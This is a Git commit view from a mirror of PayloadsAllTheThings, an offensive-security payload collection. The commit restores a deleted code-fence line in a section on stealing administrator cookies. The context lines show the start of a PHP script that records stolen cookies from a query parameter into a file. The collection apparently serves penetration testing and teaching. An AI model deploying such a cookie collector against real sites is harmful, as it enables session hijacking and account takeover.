mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
Fixed an oops
Somehow I deleted line 120 in a prior commit. Fixed.
This commit is contained in:
parent
9ee8f092cd
commit
fbed4254e5
@ -117,6 +117,7 @@ Obtains the administrator cookie or sensitive access token, the following payloa
|
||||
|
||||
Write the collected data into a file.
|
||||
|
||||
```php
|
||||
<?php
|
||||
$cookie = $_GET['c'];
|
||||
$fp = fopen('cookies.txt', 'a+');
|
||||
|
Loading…
Reference in New Issue
Block a user